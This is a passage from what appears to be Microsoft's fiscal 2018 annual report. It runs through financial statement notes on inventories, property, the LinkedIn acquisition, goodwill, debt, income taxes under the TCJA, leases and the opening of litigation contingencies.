| Less derivative net assets classified as other current and long-term assets | (282) | (202) |
| Other | 2 | 1 |
| Recorded basis of investment components | $ 135,630 | $ 139,004 |

**Financial Assets and Liabilities Measured at Fair Value on a Nonrecurring Basis**

During fiscal year 2018 and 2017, we did not record any material other-than-temporary impairments on financial assets required to be measured at fair value on a nonrecurring basis.

## NOTE 7 — INVENTORIES

The components of inventories were as follows:

(In millions)

| June 30, | 2018 | 2017 |
|---|---|---|
| Raw materials | $ 655 | $ 797 |
| Work in process | 54 | 145 |
| Finished goods | 1,953 | 1,239 |
| Total | $ 2,662 | $ 2,181 |

## NOTE 8 — PROPERTY AND EQUIPMENT

The components of property and equipment were as follows:

(In millions)

| June 30, | 2018 | 2017 |
|---|---|---|
| Land | $ 1,254 | $ 1,107 |
| Buildings and improvements | 20,604 | 16,284 |
| Leasehold improvements | 4,735 | 5,064 |
| Computer equipment and software | 27,633 | 21,414 |
| Furniture and equipment | 4,457 | 4,044 |
| Total, at cost | 58,683 | 47,913 |
| Accumulated depreciation | (29,223) | (24,179) |
| Total, net | $ 29,460 | $ 23,734 |

During fiscal years 2018, 2017, and 2016, depreciation expense was $7.7 billion, $6.1 billion, and $4.9 billion, respectively. We have committed $1.9 billion for the construction of new buildings, building improvements, and leasehold improvements as of June 30, 2018.

<p align="center">NOTE 9 — BUSINESS COMBINATIONS</p>

**LinkedIn Corporation**

On December 8, 2016, we completed our acquisition of all issued and outstanding shares of LinkedIn Corporation, the world's largest professional network on the Internet, for a total purchase price of $27.0 billion. The purchase price consisted primarily of cash of $26.9 billion. The acquisition is expected to accelerate the growth of LinkedIn, Office 365, and Dynamics 365. The financial results of LinkedIn have been included in our consolidated financial statements since the date of the acquisition.

The allocation of the purchase price to goodwill was completed as of June 30, 2017. The major classes of assets and liabilities to which we allocated the purchase price were as follows:

(In millions)

| | |
|---|---:|
| Cash and cash equivalents | $ 1,328 |
| Short-term investments | 2,110 |
| Other current assets | 697 |
| Property and equipment | 1,529 |
| Intangible assets | 7,887 |
| Goodwill [a] | 16,803 |
| Short-term debt [b] | (1,323) |
| Other current liabilities | (1,117) |
| Deferred income taxes | (774) |
| Other | (131) |
| Total purchase price | $ 27,009 |

(a) *Goodwill was assigned to our Productivity and Business Processes segment. The goodwill was primarily attributed to increased synergies that are expected to be achieved from the integration of LinkedIn. None of the goodwill is expected to be deductible for income tax purposes.*

(b) *Convertible senior notes issued by LinkedIn on November 12, 2014, substantially all of which were redeemed after our acquisition of LinkedIn. The remaining $18 million of notes are not redeemable and are included in long-term debt in our consolidated balance sheets. Refer to Note 12 – Debt for further information.*

Following are the details of the purchase price allocated to the intangible assets acquired:

(In millions)

| | Amount | Weighted Average Life |
|---|---:|---:|
| Customer-related | $ 3,607 | 7 years |
| Marketing-related (trade names) | 2,148 | 20 years |
| Technology-based | 2,109 | 3 years |
| Contract-based | 23 | 5 years |
| Fair value of intangible assets acquired | $ 7,887 | 9 years |

Our consolidated income statements include the following revenue and operating loss attributable to LinkedIn since the date of acquisition:

(In millions)

| Year Ended June 30, | 2017 |
|---|---:|
| Revenue | $ 2,271 |
| Operating loss | (924) |

Following are the supplemental consolidated financial results of Microsoft Corporation on an unaudited pro forma basis, as if the acquisition had been consummated on July 1, 2015:

(In millions, except earnings per share)

| Year Ended June 30, | 2017 | 2016 |
|---|---|---|
| Revenue | $ 98,291 | $ 94,490 |
| Net income | 25,179 | 19,128 |
| Diluted earnings per share | 3.21 | 2.38 |

These pro forma results were based on estimates and assumptions, which we believe are reasonable. They are not the results that would have been realized had we been a combined company during the periods presented and are not necessarily indicative of our consolidated results of operations in future periods. The pro forma results include adjustments related to purchase accounting, primarily amortization of intangible assets. Acquisition costs and other nonrecurring charges were immaterial and are included in the earliest period presented.

**GitHub Inc.**

On June 4, 2018, we entered into a definitive agreement to acquire GitHub Inc. ("GitHub") for $7.5 billion in an all-stock transaction. We expect the acquisition will close by the end of the calendar year, subject to approval by GitHub's shareholders, satisfaction of certain regulatory approvals, and other customary closing conditions. GitHub will be included in our consolidated results of operations as of the date of acquisition.

**Other**

During fiscal year 2018, we completed nine acquisitions for total consideration of $948 million, substantially all of which was paid in cash. These entities have been included in our consolidated results of operations since their respective acquisition dates. Pro forma results of operations for these acquisitions have not been presented because the effects of these business combinations, individually and in aggregate, were not material to our consolidated results of operations.

<u>NOTE 10 — GOODWILL</u>

Changes in the carrying amount of goodwill were as follows:

| (In millions) | June 30, 2016 | Acquisitions | Other | June 30, 2017 | Acquisitions | Other | June 30, 2018 |
|---|---|---|---|---|---|---|---|
| Productivity and Business Processes | $ 6,678 | $ 17,072(a) | $ (11) | $ 23,739 | $ 72 | $ 12 | $ 23,823 |
| Intelligent Cloud | 5,467 | 49 | 39 | 5,555 | 164 | (16) | 5,703 |
| More Personal Computing | 5,727 | 115 | (14) | 5,828 | 394 | (65) | 6,157 |
| Total | $ 17,872 | $ 17,236 | $ 14 | $ 35,122 | $ 630 | $ (69) | $ 35,683 |

(a) *Includes goodwill related to LinkedIn and other acquisitions. Refer to Note 9 – Business Combinations for further information.*

The measurement periods for the valuation of assets acquired and liabilities assumed end as soon as information on the facts and circumstances that existed as of the acquisition dates becomes available, but do not exceed 12 months. Adjustments in purchase price allocations may require a change in the amounts allocated to goodwill during the periods in which the adjustments are determined.

Any change in the goodwill amounts resulting from foreign currency translations and purchase accounting adjustments are presented as "Other" in the above table. Also included in "Other" are business dispositions and transfers between segments due to reorganizations, as applicable.

As of June 30, 2018 and 2017, accumulated goodwill impairment was $11.3 billion.

## Goodwill Impairment

We test goodwill for impairment annually on May 1 at the reporting unit level, primarily using a discounted cash flow methodology with a peer-based, risk-adjusted weighted average cost of capital. We believe use of a discounted cash flow approach is the most reliable indicator of the fair values of the businesses.

No instances of impairment were identified in our May 1, 2018, May 1, 2017, or May 1, 2016 tests.

## NOTE 11 — INTANGIBLE ASSETS

The components of intangible assets, all of which are finite-lived, were as follows:

| (In millions) | Gross Carrying Amount | Accumulated Amortization | Net Carrying Amount | Gross Carrying Amount | Accumulated Amortization | Net Carrying Amount |
|---|---|---|---|---|---|---|
| June 30, | | | 2018 | | | 2017 |
| Technology-based | $ 7,220 | $ (5,018) | $ 2,202 | $ 7,765 | $ (4,318) | $ 3,447 |
| Customer-related | 4,031 | (1,205) | 2,826 | 4,045 | (692) | 3,353 |
| Marketing-related | 4,006 | (1,071) | 2,935 | 4,016 | (829) | 3,187 |
| Contract-based | 679 | (589) | 90 | 841 | (722) | 119 |
| Total | $ 15,936 | $ (7,883) | $ 8,053 | $ 16,667 | $ (6,561) | $ 10,106 |

No material impairments of intangible assets were identified during fiscal year 2018 or 2017.

During fiscal year 2016, we recorded impairment charges of $480 million related to intangible assets in the Devices reporting unit within our More Personal Computing segment. In the fourth quarter of fiscal year 2016, we tested these intangible assets for recoverability due to changes in facts and circumstances associated with the shift in strategic direction and reduced profitability expectations for our Phone business. Based on the results of our testing, we determined that the carrying value of the intangible assets was not recoverable, and an impairment charge was recorded to the extent that estimated fair value exceeded carrying value. We primarily used the income approach to determine the fair value of the intangible assets and determine the amount of impairment.

These intangible assets impairment charges were included in impairment and restructuring expenses in our consolidated income statement and reflected in Corporate and Other in our table of operating income (loss) by segment in Note 21 – Segment Information and Geographic Data.

We estimate that we have no significant residual value related to our intangible assets.

The components of intangible assets acquired during the periods presented were as follows:

| (In millions) | Amount | Weighted Average Life | Amount | Weighted Average Life |
|---|---|---|---|---|
| Year Ended June 30, | | 2018 | | 2017 |
| Technology-based | $ 178 | 4 years | $ 2,265 | 2 years |
| Marketing-related | 14 | 5 years | 2,148 | 19 years |
| Contract-based | 14 | 4 years | 63 | 6 years |
| Customer-related | 13 | 5 years | 3,607 | 7 years |
| Total | $ 219 | 5 years | $ 8,083 | 9 years |

Intangible assets amortization expense was $2.2 billion, $1.7 billion, and $978 million for fiscal years 2018, 2017, and 2016, respectively. Amortization of capitalized software was $54 million, $55 million, and $69 million for fiscal years 2018, 2017, and 2016, respectively.

The following table outlines the estimated future amortization expense related to intangible assets held as of June 30, 2018:

**(In millions)**

| Year Ending June 30, | | |
|---|---|---|
| 2019 | $ | 1,785 |
| 2020 | | 1,260 |
| 2021 | | 1,043 |
| 2022 | | 949 |
| 2023 | | 806 |
| Thereafter | | 2,210 |
| Total | $ | 8,053 |

## NOTE 12 — DEBT

### Short-term Debt

As of June 30, 2018, we had no commercial paper issued and outstanding. As of June 30, 2017, we had $9.1 billion of commercial paper issued and outstanding, with a weighted average interest rate of 1.01% and maturities ranging from 25 days to 264 days. The estimated fair value of this commercial paper approximates its carrying value.

We have two $5.0 billion credit facilities that expire on October 30, 2018 and October 31, 2022, respectively. These credit facilities serve as a back-up for our commercial paper program. As of June 30, 2018, we were in compliance with the only financial covenant in both credit agreements, which requires us to maintain a coverage ratio of at least three times earnings before interest, taxes, depreciation, and amortization to interest expense, as defined in the credit agreements. No amounts were drawn against these credit facilities during any of the periods presented.

### Long-term Debt

As of June 30, 2018, the total carrying value and estimated fair value of our long-term debt, including the current portion, were $76.2 billion and $77.5 billion, respectively. As of June 30, 2017, the total carrying value and estimated fair value of our long-term debt, including the current portion, were $77.1 billion and $80.3 billion, respectively. These estimated fair values are based on Level 2 inputs.

The components of our long-term debt, including the current portion, and the associated interest rates were as follows:

| (In millions, except interest rates) | Face Value June 30, 2018 | Face Value June 30, 2017 | Stated Interest Rate | Effective Interest Rate |
|---|---|---|---|---|
| **Notes** | | | | |
| November 15, 2017 | $ 0 | $ 600 | 0.875% | 1.084% |
| May 1, 2018 | 0 | 450 | 1.000% | 1.106% |
| November 3, 2018 | 1,750 | 1,750 | 1.300% | 1.396% |
| December 6, 2018 | 1,250 | 1,250 | 1.625% | 1.824% |
| June 1, 2019 | 1,000 | 1,000 | 4.200% | 4.379% |
| August 8, 2019 | 2,500 | 2,500 | 1.100% | 1.203% |
| November 1, 2019 | 18 | 18 | 0.500% | 0.500% |
| February 6, 2020 | 1,500 | 1,500 | 1.850% | 1.952% |
| February 12, 2020 | 1,500 | 1,500 | 1.850% | 1.935% |
| October 1, 2020 | 1,000 | 1,000 | 3.000% | 3.137% |
| November 3, 2020 | 2,250 | 2,250 | 2.000% | 2.093% |
| February 8, 2021 | 500 | 500 | 4.000% | 4.082% |
| August 8, 2021 | 2,750 | 2,750 | 1.550% | 1.642% |
| December 6, 2021 (a) | 2,044 | 1,996 | 2.125% | 2.233% |
| February 6, 2022 | 1,750 | 1,750 | 2.400% | 2.520% |
| February 12, 2022 | 1,500 | 1,500 | 2.375% | 2.466% |
| November 3, 2022 | 1,000 | 1,000 | 2.650% | 2.717% |
| November 15, 2022 | 750 | 750 | 2.125% | 2.239% |
| May 1, 2023 | 1,000 | 1,000 | 2.375% | 2.465% |
| August 8, 2023 | 1,500 | 1,500 | 2.000% | 2.101% |
| December 15, 2023 | 1,500 | 1,500 | 3.625% | 3.726% |
| February 6, 2024 | 2,250 | 2,250 | 2.875% | 3.041% |
| February 12, 2025 | 2,250 | 2,250 | 2.700% | 2.772% |
| November 3, 2025 | 3,000 | 3,000 | 3.125% | 3.176% |
| August 8, 2026 | 4,000 | 4,000 | 2.400% | 2.464% |
| February 6, 2027 | 4,000 | 4,000 | 3.300% | 3.383% |
| December 6, 2028 (a) | 2,044 | 1,996 | 3.125% | 3.218% |
| May 2, 2033 (a) | 642 | 627 | 2.625% | 2.690% |
| February 12, 2035 | 1,500 | 1,500 | 3.500% | 3.604% |
| November 3, 2035 | 1,000 | 1,000 | 4.200% | 4.260% |
| August 8, 2036 | 2,250 | 2,250 | 3.450% | 3.510% |
| February 6, 2037 | 2,500 | 2,500 | 4.100% | 4.152% |
| June 1, 2039 | 750 | 750 | 5.200% | 5.240% |
| October 1, 2040 | 1,000 | 1,000 | 4.500% | 4.567% |
| February 8, 2041 | 1,000 | 1,000 | 5.300% | 5.361% |
| November 15, 2042 | 900 | 900 | 3.500% | 3.571% |
| May 1, 2043 | 500 | 500 | 3.750% | 3.829% |
| December 15, 2043 | 500 | 500 | 4.875% | 4.918% |
| February 12, 2045 | 1,750 | 1,750 | 3.750% | 3.800% |
| November 3, 2045 | 3,000 | 3,000 | 4.450% | 4.492% |
| August 8, 2046 | 4,500 | 4,500 | 3.700% | 3.743% |
| February 6, 2047 | 3,000 | 3,000 | 4.250% | 4.287% |
| February 12, 2055 | 2,250 | 2,250 | 4.000% | 4.063% |
| November 3, 2055 | 1,000 | 1,000 | 4.750% | 4.782% |
| August 8, 2056 | 2,250 | 2,250 | 3.950% | 4.033% |
| February 6, 2057 | 2,000 | 2,000 | 4.500% | 4.528% |
| Total | $ 76,898 | $ 77,837 | | |

(a)   *Euro-denominated debt securities.*

The notes in the table above are senior unsecured obligations and rank equally with our other senior unsecured debt outstanding. Interest on these notes is paid semi-annually, except for the euro-denominated debt securities on which interest is paid annually. Cash paid for interest on our debt for fiscal years 2018, 2017, and 2016 was $2.4 billion, $1.6 billion, and $1.1 billion, respectively. As of June 30, 2018 and 2017, the aggregate debt issuance costs and unamortized discount associated with our long-term debt, including the current portion, were $658 million and $715 million, respectively.

Maturities of our long-term debt for each of the next five years and thereafter are as follows:

(In millions)

| Year Ending June 30, | |
| --- | ---: |
| 2019 | $  4,000 |
| 2020 | 5,518 |
| 2021 | 3,750 |
| 2022 | 8,044 |
| 2023 | 2,750 |
| Thereafter | 52,836 |
| Total | $ 76,898 |

## NOTE 13 — INCOME TAXES

**Recent Tax Legislation**

On December 22, 2017, the TCJA was enacted into law, which significantly changes existing U.S. tax law and includes numerous provisions that affect our business, such as imposing a one-time transition tax on deemed repatriation of deferred foreign income, reducing the U.S. federal statutory tax rate, and adopting a territorial tax system. The TCJA required us to incur a one-time transition tax on deferred foreign income not previously subject to U.S. income tax at a rate of 15.5% for foreign cash and certain other net current assets, and 8% on the remaining income. The TCJA also reduced the U.S. federal statutory tax rate from 35% to 21% effective January 1, 2018. For fiscal year 2018, our blended U.S. federal statutory tax rate is 28.1%. This is the result of using the tax rate of 35% for the first and second quarter of fiscal year 2018 and the reduced tax rate of 21% for the third and fourth quarter of fiscal year 2018. The TCJA includes a provision to tax global intangible low-taxed income ("GILTI") of foreign subsidiaries and a base erosion anti-abuse tax ("BEAT") measure that taxes certain payments between a U.S. corporation and its foreign subsidiaries. The GILTI and BEAT provisions of the TCJA will be effective for us beginning July 1, 2018.

The TCJA was effective in the second quarter of fiscal year 2018. As of June 30, 2018, we have not completed our accounting for the estimated tax effects of the TCJA. During fiscal year 2018, we recorded a provisional net charge of $13.7 billion related to the TCJA based on reasonable estimates for those tax effects. Due to the timing of the enactment and the complexity in applying the provisions of the TCJA, the provisional net charge is subject to revisions as we continue to complete our analysis of the TCJA, collect and prepare necessary data, and interpret any additional guidance issued by the U.S. Treasury Department, Internal Revenue Service ("IRS"), FASB, and other standard-setting and regulatory bodies. Adjustments may materially impact our provision for income taxes and effective tax rate in the period in which the adjustments are made. Our accounting for the estimated tax effects of the TCJA will be completed during the measurement period, which is not expected to extend beyond one year from the enactment date. The impacts of our estimates are described further below.

During fiscal year 2018, we recorded an estimated net charge of $13.7 billion related to the TCJA, due to the impact of the one-time transition tax on the deemed repatriation of deferred foreign income of $17.9 billion, offset in part by the impact of changes in the tax rate of $4.2 billion, primarily on deferred tax assets and liabilities.

We recorded an estimated $17.9 billion charge in fiscal year 2018 related to the transition tax, which was included in the provision for income taxes in our consolidated income statements and income taxes in our consolidated balance sheets. We have not yet completed our accounting for the transition tax as our analysis of deferred foreign income is not complete. To calculate the transition tax, we estimated our deferred foreign income for fiscal year 2018 because these tax returns are not complete or due. Fiscal year 2018 taxable income will be known once the respective tax returns are completed and filed. In addition, U.S. and foreign audit settlements may significantly impact the estimated transition tax. The impact of the U.S. and foreign audits on the transition tax will be known as the audits are concluded.

In addition, we recorded an estimated $4.2 billion benefit in fiscal year 2018 from the impact of changes in the tax rate, primarily on deferred tax assets and liabilities, which was included in provision for income taxes in our consolidated income statements and deferred income taxes and long-term income taxes in our consolidated balance sheets. We remeasured our deferred taxes to reflect the reduced rate that will apply when these deferred taxes are settled or realized in future periods.

The TCJA subjects a U.S. corporation to tax on its GILTI. Due to the complexity of the new GILTI tax rules, we are continuing to evaluate this provision of the TCJA and the application of GAAP. Under GAAP, we can make an accounting policy election to either treat taxes due on the GILTI inclusion as a current period expense or factor such amounts into our measurement of deferred taxes. We elected the deferred method, and the corresponding deferred tax assets and liabilities are included in the table of deferred income tax assets and liabilities below.

On August 1, 2018, the Internal Revenue Service published on its website proposed regulations relating to the transition tax imposed by the TCJA. Once published in the Federal Register, the proposed regulations are subject to a 60-day comment period. Final regulations are expected to be issued after consideration of comments. We are currently evaluating the impact of the proposed regulations.

### Provision for Income Taxes

The components of the provision for income taxes were as follows:

(In millions)

| Year Ended June 30, | 2018 | 2017 | 2016 |
|---|---|---|---|
| **Current Taxes** | | | |
| U.S. federal | $ **19,764** | $ 2,739 | $ 545 |
| U.S. state and local | **934** | 30 | 136 |
| Foreign | **4,348** | 2,472 | 1,940 |
| Current taxes | $ **25,046** | $ 5,241 | $ 2,621 |
| **Deferred Taxes** | | | |
| U.S. federal | $ **(4,292)** | $ (554) | $ 1,919 |
| U.S. state and local | **(458)** | 269 | 111 |
| Foreign | **(393)** | (544) | 449 |
| Deferred taxes | $ **(5,143)** | $ (829) | $ 2,479 |
| Provision for income taxes | $ **19,903** | $ 4,412 | $ 5,100 |

U.S. and foreign components of income before income taxes were as follows:

(In millions)

| Year Ended June 30, | 2018 | 2017 | 2016 |
|---|---|---|---|
| U.S. | $ **11,527** | $ 6,843 | $ 5,125 |
| Foreign | **24,947** | 23,058 | 20,514 |
| Income before income taxes | $ **36,474** | $ 29,901 | $ 25,639 |

### Effective Tax Rate

The items accounting for the difference between income taxes computed at the U.S. federal statutory rate and our effective rate were as follows:

| Year Ended June 30, | 2018 | 2017 | 2016 |
|---|---|---|---|
| Federal statutory rate | **28.1%** | 35.0% | 35.0% |
| Effect of: | | | |
| Foreign earnings taxed at lower rates | **(7.8)%** | (11.6)% | (14.5)% |
| Impacts of TCJA | **37.7%** | 0% | 0% |
| Phone business losses | **0%** | (5.7)% | 1.0% |
| Excess tax benefits relating to stock-based compensation | **(2.5)%** | (2.1)% | (1.6)% |
| Interest, net | **1.2%** | 1.4% | 0.9% |
| Other reconciling items, net | **(2.1)%** | (2.2)% | (0.9)% |
| Effective rate | **54.6%** | 14.8% | 19.9% |

The increase from the federal statutory rate in fiscal year 2018 is primarily due to the net charge related to the enactment of the TCJA in the second quarter of fiscal year 2018, offset in part by earnings taxed at lower rates in foreign jurisdictions. The decrease from the federal statutory rate in fiscal year 2017 and 2016 is primarily due to earnings taxed at lower rates in foreign jurisdictions. Our foreign regional operating centers in Ireland, Singapore and Puerto Rico, which are taxed at rates lower than the U.S. rate, generated 87%, 76%, and 91% of our foreign income before tax in fiscal years 2018, 2017, and 2016, respectively. Other reconciling items, net consists primarily of tax credits, U.S. state income taxes, and domestic production activities deduction. In fiscal years 2018, 2017, and 2016, there were no individually significant other reconciling items.

The increase in our effective tax rate for fiscal year 2018 compared to fiscal year 2017 was primarily due to the net charge related to the enactment of the TCJA and the realization of tax benefits attributable to previous Phone business losses in fiscal year 2017. The decrease in our effective tax rate for fiscal year 2017 compared to fiscal year 2016 was primarily due to the realization of tax benefits attributable to previous Phone business losses, offset in part by changes in the mix of our income before income taxes between the U.S. and foreign countries.

The components of the deferred income tax assets and liabilities were as follows:

(In millions)

| June 30, | | 2018 | | 2017 |
|---|---|---|---|---|
| **Deferred Income Tax Assets** | | | | |
| Stock-based compensation expense | $ | **460** | $ | 777 |
| Accruals, reserves, and other expenses | | **1,832** | | 1,859 |
| Loss and credit carryforwards | | **3,369** | | 4,809 |
| Depreciation and amortization | | **351** | | 53 |
| Other | | **56** | | 255 |
| Deferred income tax assets | | **6,068** | | 7,753 |
| Less valuation allowance | | **(3,186)** | | (3,310) |
| Deferred income tax assets, net of valuation allowance | $ | **2,882** | $ | 4,443 |
| **Deferred Income Tax Liabilities** | | | | |
| Foreign earnings | $ | **0** | $ | (1,134) |
| Unrealized gain on investments and debt | | **0** | | (1,384) |
| Unearned revenue | | **(639)** | | (5,760) |
| Depreciation and amortization | | **(1,103)** | | (1,630) |
| Other | | **(312)** | | (21) |
| Deferred income tax liabilities | $ | **(2,054)** | $ | (9,929) |
| Net deferred income tax assets (liabilities) | $ | **828** | $ | (5,486) |
| **Reported As** | | | | |
| Other long-term assets | $ | **1,369** | $ | 248 |
| Long-term deferred income tax liabilities | | **(541)** | | (5,734) |
| Net deferred income tax assets (liabilities) | $ | **828** | $ | (5,486) |

We recorded a deferred tax liability of $7.4 billion related to the recognition of revenue as part of the adoption of the new revenue standard.

As of June 30, 2018, we had federal, state and foreign net operating loss carryforwards of $257 million, $1.4 billion and $11.4 billion, respectively. The federal and state net operating loss carryforwards will expire in various years from fiscal 2019 through 2038, if not utilized. The majority of our foreign net operating loss carryforwards do not expire. Certain acquired net operating loss carryforwards are subject to an annual limitation, but are expected to be realized with the exception of those which have a valuation allowance.

The valuation allowance disclosed in the table above relates to the foreign net operating loss carryforwards and other net deferred tax assets that may not be realized.

Deferred income tax balances reflect the effects of temporary differences between the carrying amounts of assets and liabilities and their tax bases and are stated at enacted tax rates expected to be in effect when the taxes are paid or recovered.

Income taxes paid, net of refunds, were $5.5 billion, $2.4 billion, and $3.9 billion in fiscal years 2018, 2017, and 2016, respectively.

## Uncertain Tax Positions

Unrecognized tax benefits as of June 30, 2018, 2017, and 2016, were $12.0 billion, $11.7 billion, and $10.2 billion, respectively, and were included in long-term income taxes in our consolidated balance sheets. If recognized, these tax

benefits would affect our effective tax rates for fiscal years 2018, 2017, and 2016, by $11.3 billion, $10.2 billion, and $8.8 billion, respectively.

As of June 30, 2018, 2017, and 2016, we had accrued interest expense related to uncertain tax positions of $3.0 billion, $2.3 billion, and $1.9 billion, respectively, net of income tax benefits. Interest expense on unrecognized tax benefits, net of tax effects, was $688 million, $399 million, and $163 million in fiscal years 2018, 2017, and 2016, respectively, and was included in provision for income taxes.

The aggregate changes in the balance of unrecognized tax benefits were as follows:

(In millions)

| Year Ended June 30, | 2018 | 2017 | 2016 |
|---|---|---|---|
| Balance, beginning of year | $ 11,737 | $ 10,164 | $ 9,599 |
| Decreases related to settlements | (193) | (4) | (201) |
| Increases for tax positions related to the current year | 1,445 | 1,277 | 1,086 |
| Increases for tax positions related to prior years | 151 | 397 | 115 |
| Decreases for tax positions related to prior years | (1,176) | (49) | (317) |
| Decreases due to lapsed statutes of limitations | (3) | (48) | (118) |
| Balance, end of year | $ 11,961 | $ 11,737 | $ 10,164 |

While we settled a portion of the IRS audit for tax years 2004 to 2006 during the third quarter of fiscal year 2011, and a portion of the IRS audit for tax years 2007 to 2009 during the first quarter of fiscal year 2016, we remain under audit for those years. In the second quarter of fiscal year 2018, we settled a portion of the IRS audit for tax years 2010 to 2013. We continue to be subject to examination by the IRS for tax years 2010 to 2017. In February 2012, the IRS withdrew its 2011 Revenue Agents Report for tax years 2004 to 2006 and reopened the audit phase of the examination. As of June 30, 2018, the primary unresolved issue relates to transfer pricing, which could have a significant impact in our consolidated financial statements if not resolved favorably. We believe our allowances for income tax contingencies are adequate. We have not received a proposed assessment for the unresolved issues and do not expect a final resolution of these issues in the next 12 months. Based on the information currently available, we do not anticipate a significant increase or decrease to our tax contingencies for these issues within the next 12 months.

We are subject to income tax in many jurisdictions outside the U.S. Our operations in certain jurisdictions remain subject to examination for tax years 1996 to 2017, some of which are currently under audit by local tax authorities. The resolution of each of these audits is not expected to be material to our consolidated financial statements.

## NOTE 14 — RESTRUCTURING CHARGES

### 2016 Restructuring

In the fourth quarter of fiscal year 2016, management approved restructuring plans that resulted in approximately 4,700 job eliminations in fiscal year 2017, primarily across our smartphone hardware business and global sales. In fiscal year 2016, we incurred restructuring charges of $501 million in connection with the 2016 restructuring plans, including severance expenses and other reorganization costs. The actions associated with these restructuring plans were completed as of June 30, 2017.

### 2017 Restructuring

In June 2017, management approved a sales and marketing restructuring plan. In fiscal year 2017, we recorded employee severance expenses of $306 million primarily related to this sales and marketing restructuring plan. The actions associated with this restructuring plan were completed as of June 30, 2018.

## NOTE 15 — UNEARNED REVENUE

Unearned revenue by segment was as follows:

**(In millions)**

| June 30, | | 2018 | | 2017 |
|---|---|---:|---|---:|
| Productivity and Business Processes | $ | **14,864** | $ | 12,692 |
| Intelligent Cloud | | **14,706** | | 11,152 |
| More Personal Computing | | **3,150** | | 2,812 |
| Total | $ | **32,720** | $ | 26,656 |

The opening balance of unearned revenue was $22.2 billion as of July 1, 2016.

Changes in unearned revenue were as follows:

**(In millions)**

| Year Ended June 30, 2018 | | |
|---|---|---:|
| Balance, beginning of period | $ | **26,656** |
| Deferral of revenue | | **61,142** |
| Recognition of unearned revenue | | **(55,078)** |
| Balance, end of period | $ | **32,720** |

Revenue allocated to remaining performance obligations represents contracted revenue that has not yet been recognized ("contracted not recognized revenue"), which includes unearned revenue and amounts that will be invoiced and recognized as revenue in future periods. Contracted not recognized revenue was $73 billion as of June 30, 2018, of which we expect to recognize approximately 60% of the revenue over the next 12 months and the remainder thereafter.

## NOTE 16 — LEASES

We have operating and finance leases for datacenters, corporate offices, research and development facilities, retail stores, and certain equipment. Our leases have remaining lease terms of 1 year to 20 years, some of which include options to extend the leases for up to 5 years, and some of which include options to terminate the leases within 1 year.

The components of lease expense were as follows:

(In millions)

| Year Ended June 30, | 2018 | 2017 | 2016 |
|---|---|---|---|
| Operating lease cost | $ 1,585 | $ 1,412 | $ 936 |
| Finance lease cost: | | | |
| Amortization of right-of-use assets | $ 243 | $ 104 | $ 28 |
| Interest on lease liabilities | 175 | 68 | 28 |
| Total finance lease cost | $ 418 | $ 172 | $ 56 |

Supplemental cash flow information related to leases was as follows:

(In millions)

| Year Ended June 30, | 2018 | 2017 | 2016 |
|---|---|---|---|
| Cash paid for amounts included in the measurement of lease liabilities: | | | |
| Operating cash flows from operating leases | $ 1,522 | $ 1,157 | $ 936 |
| Operating cash flows from finance leases | 175 | 68 | 28 |
| Financing cash flows from finance leases | 144 | 46 | 6 |
| Right-of-use assets obtained in exchange for lease obligations: | | | |
| Operating leases | 1,571 | 1,270 | 1,062 |
| Finance leases | 1,933 | 1,773 | 413 |

Supplemental balance sheet information related to leases was as follows:

(In millions, except lease term and discount rate)

| June 30, | 2018 | 2017 |
|---|---|---|
| **Operating Leases** | | |
| Operating lease right-of-use assets | $ 6,686 | $ 6,555 |
| Other current liabilities | $ 1,399 | $ 1,423 |
| Operating lease liabilities | 5,568 | 5,372 |
| Total operating lease liabilities | $ 6,967 | $ 6,795 |
| **Finance Leases** | | |
| Property and equipment, gross | $ 4,543 | $ 2,658 |
| Accumulated depreciation | (404) | (161) |
| Property and equipment, net | $ 4,139 | $ 2,497 |
| Other current liabilities | $ 176 | $ 113 |
| Other long-term liabilities | 4,125 | 2,425 |
| Total finance lease liabilities | $ 4,301 | $ 2,538 |
| **Weighted Average Remaining Lease Term** | | |
| Operating leases | 7 years | 7 years |
| Finance leases | 13 years | 13 years |
| **Weighted Average Discount Rate** | | |
| Operating leases | 2.7% | 2.5% |
| Finance leases | 5.2% | 4.7% |

Maturities of lease liabilities were as follows:

(In millions)

| Year Ending June 30, | | Operating Leases | | Finance Leases |
|---|---|---|---|---|
| 2019 | $ | 1,492 | $ | 386 |
| 2020 | | 1,347 | | 393 |
| 2021 | | 1,086 | | 401 |
| 2022 | | 902 | | 408 |
| 2023 | | 721 | | 410 |
| Thereafter | | 2,157 | | 4,036 |
| Total lease payments | | 7,705 | | 6,034 |
| Less imputed interest | | (738) | | (1,733) |
| Total | $ | 6,967 | $ | 4,301 |

As of June 30, 2018, we have additional operating and finance leases, primarily for datacenters, that have not yet commenced of $594 million and $2.4 billion, respectively. These operating and finance leases will commence between fiscal year 2019 and fiscal year 2020 with lease terms of 1 year to 20 years.

## NOTE 17 — CONTINGENCIES

### Patent and Intellectual Property Claims

There were 34 patent infringement cases pending against Microsoft as of June 30, 2018, none of which are material individually or in aggregate.

### Antitrust, Unfair Competition, and Overcharge Class Actions

Antitrust and unfair competition class action lawsuits were filed against us in British Columbia, Ontario, and Quebec, Canada. All three have been certified on behalf of Canadian indirect purchasers who acquired licenses for Microsoft operating system software and/or productivity application software between 1998 and 2010.

The trial of the British Columbia action commenced in May 2016. Following a mediation, the parties agreed to a global settlement of all three Canadian actions, and have submitted the proposed settlement agreement to the courts in all three jurisdictions for approval. The courts will likely reach a decision on approval in September 2018.

### Other Antitrust Litigation and Claims

#### China State Administration for Industry and Commerce Investigation

In 2014, Microsoft was informed that China's State Agency for Market Regulation ("SAMR") (formerly State Administration for Industry and Commerce) had begun a formal investigation relating to China's Anti-Monopoly Law, and the SAMR conducted onsite inspections of Microsoft offices in Beijing, Shanghai, Guangzhou, and Chengdu. SAMR has stated the investigation relates to compatibility, bundle sales, file verification issues related to Windows and Office software, and potentially other issues.

**Product-Related Litigation**

*U.S. Cell Phone Litigation*

